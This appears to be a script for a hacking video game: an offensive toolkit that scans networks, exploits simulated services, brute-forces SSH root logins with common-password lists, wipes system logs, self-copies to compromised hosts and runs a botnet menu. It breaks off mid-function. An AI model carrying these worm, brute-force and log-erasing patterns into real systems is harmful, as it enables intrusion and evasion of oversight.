// main.nini - Revenant OS v3.0

// Declarar variables globales PRIMERO (antes de importar)
global enjambre = {}
global objetivo_actual = null
global custom_object = {}
global ultimo_scan = []
global modo = "REMOTO"
global vault_data = []

// Core
// --- INICIO SUB-MODULO: core/kernel.nini ---
// core/kernel.nini - Corazon de Revenant

Buffer = {}
Buffer.items = []
Buffer.max_size = 50

Buffer.push = function(objeto, descripcion)
    si len(Buffer.items) >= Buffer.max_size: Buffer.items.remove(0)
    item = {"objeto": objeto, "tipo": typeof(objeto), "descripcion": descripcion or "Sin desc", "timestamp": time, "id": len(Buffer.items)}
    Buffer.items.push(item)
    retornar item.id

Buffer.get = function(index)
    si index < 0 or index >= len(Buffer.items): retornar null
    retornar Buffer.items[index].objeto

Buffer.list = function()
    si len(Buffer.items) == 0:
        info("BUFFER vacio")
        retornar ""
    columnas = ["#", "Tipo", "Descripcion"]
    filas = []
    para i en rango(0, len(Buffer.items)):
        item = Buffer.items[i]
        filas.push([i + 1, item.tipo, item.descripcion])
    retornar construir_tabla(columnas, filas)

Buffer.clear = function()
    Buffer.items = []
    info("BUFFER limpiado")

Cob = {}
Cob.set = function(clave, valor)
    globals.custom_object[clave] = valor
    retornar verdadero
Cob.get = function(clave)
    si globals.custom_object.hasIndex(clave): retornar globals.custom_object[clave]
    retornar null
Cob.del = function(clave)
    si globals.custom_object.hasIndex(clave): globals.custom_object.remove(clave)

Clipboard = {}
Clipboard.alpha = null
Clipboard.beta = null
Clipboard.gamma = null
Clipboard.set = function(espacio, valor)
    si espacio == "a": Clipboard.alpha = valor
    si espacio == "b": Clipboard.beta = valor
    si espacio == "c": Clipboard.gamma = valor
Clipboard.get = function(espacio)
    si espacio == "a": retornar Clipboard.alpha
    si espacio == "b": retornar Clipboard.beta
    si espacio == "c": retornar Clipboard.gamma
    retornar null

Aliases = {}
Aliases.lista = {"h": "ayuda", "?": "ayuda", "ll": "lateral", "ss": "sesiones", "sc": "silentclean", "rc": "rclean", "ex": "exfil", "pe": "persistencia"}
Aliases.custom = {}
Aliases.agregar = function(alias, comando)
    Aliases.custom[alias] = comando
    info("Alias: " + alias + " -> " + comando)
Aliases.resolver = function(entrada)
    si Aliases.custom.hasIndex(entrada): retornar Aliases.custom[entrada]
    si Aliases.lista.hasIndex(entrada): retornar Aliases.lista[entrada]
    retornar entrada
Aliases.listar = function()
    columnas = ["Alias", "Comando", "Tipo"]
    filas = []
    para alias in Aliases.lista.indexes: filas.push([alias, Aliases.lista[alias], "Sistema"])
    para alias in Aliases.custom.indexes: filas.push([alias, Aliases.custom[alias], "Custom"])
    retornar construir_tabla(columnas, filas)

Kernel = {}
Kernel.sesion_activa = null
Kernel.ip_activa = ""
Kernel.usuario = "guest"
Kernel.home_path = "/home"
Kernel.current_path = "/home"
Kernel.modo = "REMOTO"
Kernel.prompt_completo = verdadero

Kernel.actualizar_info = function(sesion)
    si sesion == null: retornar
    Kernel.sesion_activa = sesion
    Kernel.ip_activa = globals.objetivo_actual or ""
    si typeof(sesion) == "shell":
        Kernel.usuario = sesion.user
        Kernel.home_path = sesion.home_dir
        Kernel.current_path = sesion.current_dir

Kernel.info = function()
    columnas = ["Propiedad", "Valor"]
    filas = [
        ["Sesion", Kernel.ip_activa or "Ninguna",],
        ["Usuario", Kernel.usuario,],
        ["Path", Kernel.current_path,],
        ["Modo", Kernel.modo,],
        ["Sesiones", str(len(enjambre)),],
        ["Buffer", str(len(Buffer.items)),],
    ]
    retornar construir_tabla(columnas, filas)

Config = {}
Config.archivo = "/root/.revenantrc"
Config.datos = {"color_primario": "#00e5ff", "auto_jump": verdadero, "max_buffer": 50}
Config.guardar = function()
    contenido = ""
    para clave in Config.datos.indexes: contenido = contenido + clave + "=" + str(Config.datos[clave]) + char(10)
    archivo = get_shell().host_computer.File(Config.archivo)
    si archivo: archivo.set_content(contenido)
Config.cargar = function()
    archivo = get_shell().host_computer.File(Config.archivo)
    si no archivo: retornar
    contenido = archivo.get_content
    si contenido == null or contenido == "": retornar
    lineas = contenido.split(char(10))
    para linea in lineas:
        si linea == "": continue
        partes = linea.split("=")
        si len(partes) >= 2: Config.datos[partes[0].trim] = partes[1:].join("=").trim
Config.obtener = function(clave, default)
    si Config.datos.hasIndex(clave): retornar Config.datos[clave]
    retornar default
Config.establecer = function(clave, valor)
    Config.datos[clave] = valor
    Config.guardar()

Log = {}
Log.historial = []
Log.maximo = 100
Log.agregar = function(tipo, mensaje)
    Log.historial.push({"tipo": tipo, "mensaje": mensaje, "tiempo": time})
    si len(Log.historial) > Log.maximo: Log.historial.remove(0)
Log.ver = function(cantidad)
    cantidad = cantidad or 20
    inicio = len(Log.historial) > cantidad >> len(Log.historial) - cantidad |: 0
    para i en rango(inicio, len(Log.historial)):
        entrada = Log.historial[i]
        print(entrada.tipo + ": " + entrada.mensaje)

Kernel.obtener_archivo = function(comp, ruta)
    si no comp o no ruta: retornar null
    si typeof(comp) == "shell": comp = comp.host_computer
    si typeof(comp) != "computer": retornar null
    
    // Solo intentar acceso directo si es local
    es_local = comp.public_ip == get_shell().host_computer.public_ip and comp.local_ip == get_shell().host_computer.local_ip
    si es_local:
        archivo = comp.File(ruta)
        si archivo: retornar archivo
    
    // Navegación manual para remotos (evita 'Invalid arguments')
    partes = ruta.split("/")
    actual = comp.File("/")
    si no actual: retornar null
    
    para parte en partes:
        si parte == "" o parte == ".": continue
        encontrado = nulo
        hijos = actual.get_folders + actual.get_files
        para h en hijos:
            si h.name == parte:
                encontrado = h
                break
        si no encontrado: retornar null
        actual = encontrado
    retornar actual

Kernel.inicializar = function()
    Config.cargar()
    si no globals.hasIndex("custom_object"): globals.custom_object = {}
    si no globals.hasIndex("enjambre"): globals.enjambre = {}
    info("Kernel inicializado")

Kernel.inicializar()

// --- FIN SUB-MODULO: core/kernel.nini ---
// --- INICIO SUB-MODULO: core/shell.nini ---
// core/shell.nini - Shell con Glasspool y Piping

Glasspool = {}
Glasspool.sesion = null
Glasspool.activo = falso

Glasspool.configurar = function(sesion)
    Glasspool.sesion = sesion
    Glasspool.activo = verdadero
    info("Glasspool activo")

Glasspool.ejecutar = function(comando)
    si no Glasspool.activo or Glasspool.sesion == null: retornar null
    si typeof(Glasspool.sesion) == "shell": retornar Glasspool.sesion.launch("/bin/bash", "-c '" + comando + "'")
    retornar null

Glasspool.desactivar = function()
    Glasspool.sesion = null
    Glasspool.activo = falso
    info("Glasspool desactivado")

Shell = {}
Shell.comandos = {}

Shell.registrar = function(nombre, funcion, help_text)
    Shell.comandos[nombre] = {"funcion": funcion, "help": help_text or "Sin descripcion"}

Shell.ejecutar = function(nombre, args)
    nombre = Aliases.resolver(nombre)
    si Shell.comandos.hasIndex(nombre):
        funcion = Shell.comandos[nombre].funcion
        si len(args) == 0: retornar funcion()
        si len(args) == 1: retornar funcion(args[0])
        si len(args) == 2: retornar funcion(args[0], args[1])
        si len(args) == 3: retornar funcion(args[0], args[1], args[2])
        si len(args) == 4: retornar funcion(args[0], args[1], args[2], args[3])
        retornar funcion(args.join(" "))
    si nombre == "ls" or nombre == "dir": retornar Shell.cmd_ls(args)
    si nombre == "cd": retornar Shell.cmd_cd(args)
    si nombre == "cat": retornar Shell.cmd_cat(args)
    si nombre == "pwd": retornar Shell.cmd_pwd()
    si nombre == "whoami": retornar Shell.cmd_whoami()
    si nombre == "clear" or nombre == "limpiar": retornar Shell.cmd_clear()
    si nombre == "exit" or nombre == "salir": retornar "EXIT"
    error("Comando no encontrado: " + nombre)
    retornar null

Shell.cmd_ls = function(args)
    ruta = len(args) > 0 >> args[0] |: "."
    comp = get_shell().host_computer
    archivo = Kernel.obtener_archivo(comp, ruta)
    si no archivo: retornar null
    si archivo.is_directory:
        archivos = archivo.get_files
        carpetas = archivo.get_folders
        resultado = ""
        para f in carpetas: resultado = resultado + "<color=#00e5ff>" + f.name + "/</color>  "
        para f in archivos: resultado = resultado + f.name + "  "
        retornar resultado
    retornar archivo.name

Shell.cmd_cd = function(args)
    si len(args) == 0 or args[0] == "":
        Kernel.current_path = Kernel.home_path
        retornar Kernel.current_path
    nueva_ruta = args[0]
    si nueva_ruta == "..":
        partes = Kernel.current_path.split("/")
        partes.pop()
        Kernel.current_path = partes.join("/")
        si Kernel.current_path == "": Kernel.current_path = "/"
        retornar Kernel.current_path
    si nueva_ruta[0] != "/": nueva_ruta = Kernel.current_path + "/" + nueva_ruta
    partes = nueva_ruta.split("/")
    limpio = []
    para p in partes:
        si p != "" and p != ".": limpio.push(p)
    Kernel.current_path = "/" + limpio.join("/")
    retornar Kernel.current_path

Shell.cmd_cat = function(args)
    si len(args) == 0: retornar null
    ruta = args[0]
    comp = get_shell().host_computer
    archivo = Kernel.obtener_archivo(comp, ruta)
    si no archivo: retornar null
    si archivo.is_binary: retornar "Archivo binario"
    retornar archivo.get_content

Shell.cmd_pwd = function()
    retornar Kernel.current_path

Shell.cmd_whoami = function()
    retornar Kernel.usuario

Shell.cmd_clear = function()
    clear_screen()

Shell.registrar("ls", Shell.cmd_ls, "Listar archivos")
Shell.registrar("cd", Shell.cmd_cd, "Cambiar directorio")
Shell.registrar("cat", Shell.cmd_cat, "Ver archivo")
Shell.registrar("pwd", Shell.cmd_pwd, "Directorio actual")
Shell.registrar("whoami", Shell.cmd_whoami, "Usuario actual")
Shell.registrar("clear", Shell.cmd_clear, "Limpiar pantalla")

// --- FIN SUB-MODULO: core/shell.nini ---
// --- INICIO SUB-MODULO: lib/ui.nini ---
// lib/ui.nini - Componentes UI

Colores = {"rojo": "<color=#FF0000FF><b>", "cian": "<color=#00FFFFFF><b>", "verde": "<color=#00FF00FF><b>", "gris": "<color=#71858DFF><b>", "naranja": "<color=#FF8400FF><b>", "reset": "</color></b>",}

Prompt = {}
Prompt.generar = function()
    ip_pub = get_shell().host_computer.public_ip
    ip_local = get_shell().host_computer.local_ip
    user_color = Kernel.usuario == "root" >> Colores.rojo |: Colores.verde
    glass = Glasspool.activo >> Colores.cian + "|> " + Colores.reset |: Colores.verde + "|> " + Colores.reset
    retornar user_color + Kernel.usuario + Colores.reset + "@" + ip_pub + ":" + Kernel.current_path + " " + glass

Prompt.simple = function()
    si Kernel.usuario == "root": retornar Colores.rojo + "root$ " + Colores.reset
    retornar Colores.gris + "user$ " + Colores.reset

Banner = {}
Banner.mostrar = function()
    clear_screen()
    print(Colores.cian + "  REVENANT OS v3.0" + Colores.reset)
    print(Colores.gris + "  Modular | Buffer | Glasspool" + Colores.reset)
    print("")

Separador = {}
Separador.simple = function()
    print(Colores.gris + "---" + Colores.reset)

Separador.doble = function()
    print(Colores.cian + "===" + Colores.reset)

Separador.titulo = function(titulo)
    print(Colores.cian + "---[ " + titulo + " ]---" + Colores.reset)

Menu = {}
Menu.opciones = function(titulo, opciones)
    Separador.titulo(titulo)
    para i en rango(0, len(opciones)):
        print("  " + Colores.cian + "[" + str(i + 1) + "]" + Colores.reset + " " + opciones[i].label)
    Separador.simple()
    sel = user_input(Colores.cian + "Seleccion: " + Colores.reset)
    si sel == "": retornar null
    idx = val(sel) - 1
    si idx < 0 or idx >= len(opciones): retornar null
    si opciones[idx].hasIndex("cmd"): retornar opciones[idx].cmd
    retornar idx

Progress = {}
Progress.mostrar = function(actual, total, ancho)
    ancho = ancho or 30
    porcentaje = floor((actual / total) * 100)
    llenado = floor((actual / total) * ancho)
    barra = Colores.verde + "#" * llenado + Colores.gris + "-" * (ancho - llenado) + Colores.reset
    retornar "[" + barra + "] " + str(porcentaje) + "%"

Status = {}
Status.activo = function(t): retornar Colores.verde + "+ " + Colores.reset + t
Status.inactivo = function(t): retornar Colores.rojo + "- " + Colores.reset + t
Status.info = function(t): retornar Colores.cian + "* " + Colores.reset + t

// --- FIN SUB-MODULO: lib/ui.nini ---

// Commands
// --- INICIO SUB-MODULO: commands/recon.nini ---
// commands/recon.nini - Escaneo y recon

tarea escanear_puertos(ip)
    info("Escaneando " + ip + "...")
    router = get_router(ip)
    si no router: retornar null
    puertos = router.used_ports
    si len(puertos) == 0: retornar []
    resultados = []
    para port in puertos:
        resultados.push({"puerto": port.port_number, "estado": port.is_closed, "servicio": router.port_info(port), "lan_ip": port.get_lan_ip})
    columnas = ["Puerto", "Estado", "Servicio", "LAN IP"]
    filas = []
    para r in resultados:
        estado = r.estado >> "<color=#ff3131>closed</color>" |: "<color=#00ff41>open</color>"
        filas.push([r.puerto, estado, r.servicio, r.lan_ip])
    print(construir_tabla(columnas, filas))
    Buffer.push(resultados, "Scan " + ip)
    retornar resultados

tarea escanear_red(ip_base)
    si no ip_base: ip_base = ""
    info("Escaneando red " + ip_base + "...")
    si ip_base.indexOf(".") == null:
        mi_ip = get_shell().host_computer.local_ip
        partes = mi_ip.split("\.")
        ip_base = partes[0] + "." + partes[1] + "." + partes[2] + "."
    encontrados = []
    para i en rango(1, 255):
        ip = ip_base + str(i)
        resultado = get_shell().connect_service(ip, 22, "root", "")
        si resultado != null:
            exito("Encontrado: " + ip)
            encontrados.push(ip)
            enjambre[ip] = resultado
    info("Encontrados: " + str(len(encontrados)))
    si len(encontrados) > 0: Buffer.push(encontrados, "Red " + ip_base)
    retornar encontrados

tarea whois_objetivo(ip)
    router = get_router(ip)
    si no router: retornar null
    columnas = ["Propiedad", "Valor"]
    puertos_abiertos = []
    para port in router.used_ports:
        si not port.is_closed: puertos_abiertos.push(str(port.port_number))
    filas = [
        ["IP Publica", router.public_ip,],
        ["IP Local", router.local_ip,],
        ["Puertos", puertos_abiertos.join(", "),],
    ]
    print(construir_tabla(columnas, filas))
    retornar router

// --- FIN SUB-MODULO: commands/recon.nini ---
// --- INICIO SUB-MODULO: commands/exploit.nini ---
// commands/exploit.nini - Explotacion

tarea explotar_objetivo(ip, puerto)
    info("Explotando " + ip + ":" + str(puerto))
    si puerto == 0: retornar explotar_router(ip)
    vuln = buscar_vulnerabilidad(ip, puerto)
    si no vuln: retornar null
    info("Vuln: " + vuln.lib_name + " v" + vuln.version)
    para v in vuln.v_list:
        info("Probando: " + v.mem)
        sesion = explotar_directo(vuln.metalib, v.mem, v.pass, "")
        si sesion != null:
            tipo = typeof(sesion)
            si tipo == "shell" or tipo == "computer":
                exito("ACCESO OBTENIDO!")
                enjambre[ip] = sesion
                Buffer.push(sesion, "Shell " + ip)
                si Config.obtener("auto_jump", verdadero): jumping_auto(sesion, ip)
                retornar sesion
    alerta("Explotacion fallida")
    retornar null

tarea explotar_router(ip)
    router = get_router(ip)
    si no router: retornar null
    para port in router.used_ports:
        si port.is_closed: continue
        vuln = buscar_vulnerabilidad(ip, port.port_number)
        si vuln:
            para v in vuln.v_list:
                sesion = explotar_directo(vuln.metalib, v.mem, v.pass, "")
                si sesion != null:
                    exito("Router comprometido!")
                    enjambre[ip] = sesion
                    Buffer.push(sesion, "Router " + ip)
                    retornar sesion
    retornar null

tarea limpiar_logs(ip)
    si ip == "":
        archivo = Kernel.obtener_archivo(get_shell().host_computer, "/var/system.log")
        si archivo: archivo.set_content("")
        info("Logs locales limpiados")
    osi enjambre.hasIndex(ip):
        sesion = enjambre[ip]
        si typeof(sesion) == "shell":
            sesion.launch("/bin/bash", "-c 'echo > /var/system.log'")
            info("Logs remotos limpiados")

// --- FIN SUB-MODULO: commands/exploit.nini ---
// --- INICIO SUB-MODULO: commands/jump.nini ---
// commands/jump.nini - Jumping

jumping_auto = function(sesion, ip)
    si typeof(sesion) != "shell": retornar null
    comp = get_shell().host_computer
    
    // El "current file" es program_path
    script_local = comp.File(program_path)
    si no script_local: retornar null
    
    script_nombre = script_local.name
    info("Copiando a " + ip + "...")
    
    para dest en ["/tmp", "/home"]:
        sesion.host_computer.touch(dest, script_nombre)
        
        // Usar helper para obtener el archivo remoto de forma segura
        archivo_remoto = Kernel.obtener_archivo(sesion.host_computer, dest + "/" + script_nombre)
        
        si archivo_remoto:
            archivo_remoto.set_content(script_local.get_content)
            exito("Copiado a: " + dest + "/" + script_nombre)
            sesion.launch(dest + "/" + script_nombre)
            Buffer.push(sesion, "Jump " + ip)
            retornar archivo_remoto
    retornar null

tarea jump_manual
    si len(enjambre) == 0: retornar
    nodos = enjambre.indexes
    columnas = ["#", "IP", "Tipo"]
    filas = []
    para i en rango(0, len(nodos)):
        filas.push([i + 1, nodos[i], typeof(enjambre[nodos[i]])])
    print(construir_tabla(columnas, filas))
    sel = pedir("Selecciona (#): ")
    si sel == "": retornar
    idx = val(sel) - 1
    si idx < 0 or idx >= len(nodos): retornar
    jumping_auto(enjambre[nodos[idx]], nodos[idx])

tarea scan_and_jump
    mi_ip = get_shell().host_computer.local_ip
    partes = mi_ip.split(".")
    red_base = partes[0] + "." + partes[1] + "." + partes[2] + "."
    info("Escaneando " + red_base + "0/24...")
    encontrados = 0
    para i en rango(1, 255):
        ip = red_base + str(i)
        si enjambre.hasIndex(ip): continue
        para pwd in ["root", "toor", "admin", "password", "123456", ""]:
            resultado = get_shell().connect_service(ip, 22, "root", pwd)
            si resultado != null:
                exito(ip)
                enjambre[ip] = resultado
                Buffer.push(resultado, "SSH " + ip)
                encontrados = encontrados + 1
    info("ScanJump: " + str(encontrados) + " targets")

tarea jump_listar
    si len(enjambre) == 0: retornar
    columnas = ["IP", "Tipo", "Usuario"]
    filas = []
    para ip in enjambre.indexes:
        sesion = enjambre[ip]
        tipo = typeof(sesion)
        usuario = tipo == "shell" >> sesion.user |: "-"
        filas.push([ip, tipo, usuario])
    print(construir_tabla(columnas, filas))

// --- FIN SUB-MODULO: commands/jump.nini ---

// Legacy
// --- INICIO SUB-MODULO: modulos/botnet.nini ---
// modulo botnet.nini - El Alma de Revenant

tarea modulo_botnet_menu
    si len(enjambre) == 0:
        error("El enjambre esta vacio. Asalta algum objetivo primero.")
        retornar
    
    // Mostrar sesiones disponibles
    info("SESIONES ACTIVAS (" + str(len(enjambre)) + "):")
    
    nodos = enjambre.indexes
    columnas = ["#", "IP", "Tipo"]
    filas = []
    
    para i en rango(0, len(nodos)):
        ip = nodos[i]
        sesion = enjambre[ip]
        tipo = typeof(sesion)
        filas.push([i + 1, ip, tipo])
    
    print(construir_tabla(columnas, filas))
    dibujar_separador()
    
    // Seleccionar sesion
    sel = pedir("Selecciona sesion (#) o Enter para volver: ")
    si sel == "": retornar
    
    idx = val(sel) - 1
    si idx < 0 or idx >= len(nodos):
        error("Seleccion invalida.")
        retornar
    
    ip_seleccionada = nodos[idx]
    sesion_seleccionada = enjambre[ip_seleccionada]
    
    // Menu segun tipo de sesion
    modulo_sesion_interactuar(ip_seleccionada, sesion_seleccionada)

tarea modulo_sesion_interactuar(ip, sesion)
    tipo = typeof(sesion)
    info("SESION: " + ip + " (" + tipo + ")")
    
    opciones = []
    
    si tipo == "shell":
        opciones = [
            {"label": "Abrir terminal", "cmd": "terminal"},
            {"label": "Jump (copiar y ejecutar)", "cmd": "jump"},
            {"label": "Ver archivos", "cmd": "files"},
            {"label": "Informacion del sistema", "cmd": "info"},
            {"label": "Descargar archivo", "cmd": "download"},
            {"label": "Subir archivo", "cmd": "upload"},
            {"label": "Ejecutar comando", "cmd": "exec"},
            {"label": "Scan & Jump automatico", "cmd": "scanjump"},
        ]
    osi tipo == "computer":
        opciones = [
            {"label": "Ver archivos", "cmd": "files"},
            {"label": "Informacion del sistema", "cmd": "info"},
            {"label": "Descargar archivo", "cmd": "download"},
            {"label": "Subir archivo", "cmd": "upload"},
            {"label": "Crear usuario", "cmd": "adduser"},
        ]
    osi tipo == "file":
        opciones = [
            {"label": "Ver contenido", "cmd": "view"},
            {"label": "Listar directorio", "cmd": "list"},
            {"label": "Descargar", "cmd": "download"},
        ]
    osi tipo == "number" or tipo == "router":
        opciones = [
            {"label": "Ver puertos", "cmd": "ports"},
            {"label": "Ver dispositivos", "cmd": "devices"},
            {"label": "Informacion del router", "cmd": "info"},
        ]
    sino:
        opciones = [
            {"label": "Ver informacion", "cmd": "info"},
        ]
    
    accion = menu_interactivo("ACCIONES", opciones)
    si no accion: retornar
    
    // Ejecutar accion
    si accion == "terminal": sesion.start_terminal
    osi accion == "files": sesion_action_files(ip, sesion)
    osi accion == "info": sesion_action_info(ip, sesion)
    osi accion == "download": sesion_action_download(ip, sesion)
    osi accion == "upload": sesion_action_upload(ip, sesion)
    osi accion == "exec": sesion_action_exec(ip, sesion)
    osi accion == "adduser": sesion_action_adduser(ip, sesion)
    osi accion == "view": sesion_action_view_file(ip, sesion)
    osi accion == "list": sesion_action_list_dir(ip, sesion)
    osi accion == "ports": sesion_action_ports(ip, sesion)
    osi accion == "devices": sesion_action_devices(ip, sesion)
    osi accion == "jump": sesion_action_jump(ip, sesion)
    osi accion == "scanjump": sesion_action_scanjump(ip, sesion)

tarea sesion_action_jump(ip, sesion)
    si typeof(sesion) != "shell":
        error("Jump requiere una shell")
        retornar
    
    info("AUTO-JUMP a " + ip + "...")
    
    resultado = jumping_auto(sesion, ip)
    si resultado:
        exito("Jump realizado a " + ip)
    sino:
        error("No se pudo realizar el jump")

tarea sesion_action_scanjump(ip, sesion)
    // Scan & Jump: escanear red local y saltar a todos
    si typeof(sesion) != "shell":
        error("ScanJump requiere una shell")
        retornar
    
    info("SCAN & JUMP desde " + ip + "...")
    
    comp = sesion.host_computer
    router = get_router(ip)
    si no router:
        error("No se pudo obtener router")
        retornar
    
    dispositivos = router.devices_lan_ip
    si len(dispositivos) == 0:
        info("No hay dispositivos en la red local")
        retornar
    
    info("Dispositivos encontrados: " + str(len(dispositivos)))
    
    exitos = 0
    para target_ip in dispositivos:
        si target_ip == ip: siguiente
        si enjambre.hasIndex(target_ip): siguiente
        
        info("Probando " + target_ip + "...")
        
        // Intentar SSH como root con passwords comunes
        passwords = ["root", "toor", "admin", "123456", "password", ""]
        para pwd in passwords:
            resultado = get_shell().connect_service(target_ip, 22, "root", pwd)
            si resultado != null:
                exito("SSH a " + target_ip + " exitoso!")
                enjambre[target_ip] = resultado
                exitos = exitos + 1
    
    info("ScanJump completado: " + str(exitos) + " nuevas sesiones")

tarea sesion_action_files(ip, sesion)
    comp = null
    si typeof(sesion) == "shell": comp = sesion.host_computer
    osi typeof(sesion) == "computer": comp = sesion
    
    si no comp:
        error("No se pudo obtener computadora.")
        retornar
    
    root = Kernel.obtener_archivo(comp, "/")
    si no root:
        error("No se pudo acceder al sistema de archivos.")
        retornar
    
    info("ARCHIVOS EN " + ip + ":")
    listar_archivos(root, "")

tarea listar_archivos(archivo, indent)
    si no archivo: retornar
    
    nombre = archivo.name
    si nombre == "": nombre = "/"
    
    tipo_arch = ""
    si archivo.is_directory: tipo_arch = "<color=#00e5ff>[DIR]</color>"
    osi archivo.is_binary: tipo_arch = "<color=#ffea00>[BIN]</color>"
    sino: tipo_arch = "<color=#ffffff>[FILE]</color>"
    
    permisos = ""
    si archivo.has_permission("r"): permisos = permisos + "r"
    si archivo.has_permission("w"): permisos = permisos + "w"
    si archivo.has_permission("x"): permisos = permisos + "x"
    
    print(indent + tipo_arch + " " + nombre + " <color=#424242>(" + permisos + ")</color>")
    
    si archivo.is_directory:
        hijos = archivo.get_files
        si hijos:
            para hijo en hijos:
                listar_archivos(hijo, indent + "  ")

tarea sesion_action_info(ip, sesion)
    info("INFORMACION DE " + ip + ":")
    print("  Tipo: " + typeof(sesion))
    
    si typeof(sesion) == "shell":
        comp = sesion.host_computer
        print("  Usuario: " + sesion.user)
        print("  Home: " + sesion.current_dir)
        si comp:
            print("  IP Local: " + comp.local_ip)
            print("  IP Publica: " + comp.public_ip)
            print("  Hostname: " + comp.get_name)
    osi typeof(sesion) == "computer":
        print("  IP Local: " + sesion.local_ip)
        print("  IP Publica: " + sesion.public_ip)
        print("  Hostname: " + sesion.get_name)
    osi typeof(sesion) == "file":
        print("  Ruta: " + sesion.path)
        print("  Nombre: " + sesion.name)

tarea sesion_action_download(ip, sesion)
    comp = null
    si typeof(sesion) == "shell": comp = sesion.host_computer
    osi typeof(sesion) == "computer": comp = sesion
    
    si no comp:
        error("No se pudo obtener computadora.")
        retornar
    
    ruta = pedir("Ruta del archivo remoto: ")
    si ruta == "": retornar
    
    archivo = Kernel.obtener_archivo(comp, ruta)
    si no archivo:
        error("Archivo no encontrado: " + ruta)
        retornar
    
    si archivo.is_directory:
        error("No se puede descargar un directorio.")
        retornar
    
    contenido = archivo.get_content
    si contenido == null:
        error("No se pudo leer el archivo.")
        retornar
    
    nombre_local = archivo.name
    // El local siempre tiene current_path y program_path disponibles
    local_dir = parent_path(program_path)
    ruta_l = local_dir + "/" + nombre_local
    archivo_local = Kernel.obtener_archivo(get_shell().host_computer, ruta_l)
    
    si archivo_local:
        archivo_local.set_content(contenido)
    sino:
        get_shell().host_computer.touch(local_dir, nombre_local)
        archivo_local = Kernel.obtener_archivo(get_shell().host_computer, ruta_l)
        si archivo_local: archivo_local.set_content(contenido)
    
    exito("Descargado: " + nombre_local)

tarea sesion_action_upload(ip, sesion)
    comp = null
    si typeof(sesion) == "shell": comp = sesion.host_computer
    osi typeof(sesion) == "computer": comp = sesion
    
    si no comp:
        error("No se pudo obtener computadora.")
        retornar
    
    ruta_local = pedir("Ruta del archivo local: ")
    si ruta_local == "": retornar
    
    archivo_local = get_shell().host_computer.File(ruta_local)
    si no archivo_local:
        error("Archivo local no encontrado.")
        retornar
    
    contenido = archivo_local.get_content
    ruta_remota = pedir("Ruta remota (Enter=/tmp/): ")
    si ruta_remota == "": ruta_remota = "/tmp/"
    
    nombre = archivo_local.name
    comp.touch(ruta_remota, nombre)
    archivo_remoto = Kernel.obtener_archivo(comp, ruta_remota + "/" + nombre)
    
    si archivo_remoto:
        archivo_remoto.set_content(contenido)
        exito("Subido: " + ruta_remota + nombre)
    sino:
        error("No se pudo subir el archivo.")

tarea sesion_action_exec(ip, sesion)
    si typeof(sesion) != "shell":
        error("Esta accion requiere una shell.")
        retornar
    
    comando = pedir("Comando a ejecutar: ")
    si comando == "": retornar
    
    sesion.launch("/bin/sh", "-c '" + comando + "'")
    exito("Comando ejecutado.")

tarea sesion_action_adduser(ip, sesion)
    comp = null
    si typeof(sesion) == "shell": comp = sesion.host_computer
    osi typeof(sesion) == "computer": comp = sesion
    
    si no comp:
        error("No se pudo obtener computadora.")
        retornar
    
    usuario = pedir("Nuevo usuario: ")
    si usuario == "": retornar
    
    pass = pedir("Password: ")
    si pass == "": retornar
    
    resultado = comp.create_user(usuario, pass)
    si resultado == 1: exito("Usuario creado: " + usuario)
    sino: error("No se pudo crear el usuario.")

tarea sesion_action_view_file(ip, sesion)
    si typeof(sesion) != "file":
        error("Esta accion requiere un archivo.")
        retornar
    
    contenido = sesion.get_content
    si contenido == null:
        error("No se pudo leer el archivo.")
        retornar
    
    info("CONTENIDO DE " + sesion.path + ":")
    print(contenido)

tarea sesion_action_list_dir(ip, sesion)
    si typeof(sesion) != "file" or not sesion.is_directory:
        error("Esta accion requiere un directorio.")
        retornar
    
    hijos = sesion.get_files
    si no hijos or len(hijos) == 0:
        info("Directorio vacio.")
        retornar
    
    columnas = ["Nombre", "Tipo", "Tamanio"]
    filas = []
    
    para hijo in hijos:
        tipo = "FILE"
        si hijo.is_directory: tipo = "DIR"
        si hijo.is_binary: tipo = "BIN"
        filas.push([hijo.name, tipo, str(hijo.size)])
    
    print(construir_tabla(columnas, filas))

tarea sesion_action_ports(ip, sesion)
    si typeof(sesion) != "number" and typeof(sesion) != "router":
        error("Esta accion requiere un router.")
        retornar
    
    puertos = sesion.used_ports
    si no puertos or len(puertos) == 0:
        info("No hay puertos.")
        retornar
    
    columnas = ["Puerto", "Estado", "Servicio", "IP LAN"]
    filas = []
    
    para port in puertos:
        estado = "closed"
        si not port.is_closed: estado = "open"
        filas.push([port.port_number, estado, sesion.port_info(port), port.get_lan_ip])
    
    print(construir_tabla(columnas, filas))

tarea sesion_action_devices(ip, sesion)
    si typeof(sesion) != "number" and typeof(sesion) != "router":
        error("Esta accion requiere un router.")
        retornar
    
    devices = sesion.devices
    si no devices or len(devices) == 0:
        info("No hay dispositivos.")
        retornar
    
    info("DISPOSITIVOS:")
    para dev in devices:
        print("  - " + dev)

// --- FIN SUB-MODULO: modulos/botnet.nini ---
// --- INICIO SUB-MODULO: modulos/escalada.nini ---
// modulos/escalada.nini - Escalada + ChainSaw

_chain_samples = [
    "password", "123456", "qwerty", "admin", "letmein",
    "welcome", "monkey", "dragon", "master", "login",
    "shadow", "sunshine", "princess", "football", "baseball",
    "iloveyou", "trustno1", "superman", "michael", "charlie",
    "access", "hello", "ranger", "thomas", "hunter",
    "buster", "soccer", "hockey", "george", "pepper",
    "killer", "daniel", "andrew", "joshua", "michelle",
    "starwars", "freedom", "summer", "ashley", "passw0rd",
    "matrix", "secret", "orange", "computer", "pass123",
    "password1", "qwerty123", "abc123", "password123", "admin123",
]

_chain_pregens = [
    "root", "pass", "123", "abc", "qwerty", "admin", "letmein",
    "abc123", "password1", "123456", "qwerty123", "admin123",
    "root123", "toor", "changeme", "default",
]

_chain_build = function(samples, order)
    chains = {}
    para sample en samples:
        mayus = sample.upper
        si len(mayus) <= order: siguiente
        para i en rango(0, len(mayus) - order - 1):
            token = mayus[i : i + order]
            next_char = mayus[i + order]
            si no chains.hasIndex(token): chains[token] = []
            si chains[token].indexOf(next_char) == null: chains[token].push(next_char)

_chain_next = function(chains, token)
    si no chains.hasIndex(token): retornar null
    retornar chains[token][floor(rnd * len(chains[token]))]

_chain_generate = function(chains, token, max_len, order)
    password = token.lower
    mientras len(password) < max_len:
        sub = password[len(password) - order :].upper
        next_c = _chain_next(chains, sub)
        si next_c == null: salir
        password = password + next_c.lower
    retornar password

_chain_try = function(sesion, user, password, ip, port)
    si ip == "" or ip == null:
        retornar get_shell(user, password)
    retornar get_shell().connect_service(ip, port, user, password)

tarea chainsaw_crack(sesion, user, ip, port)
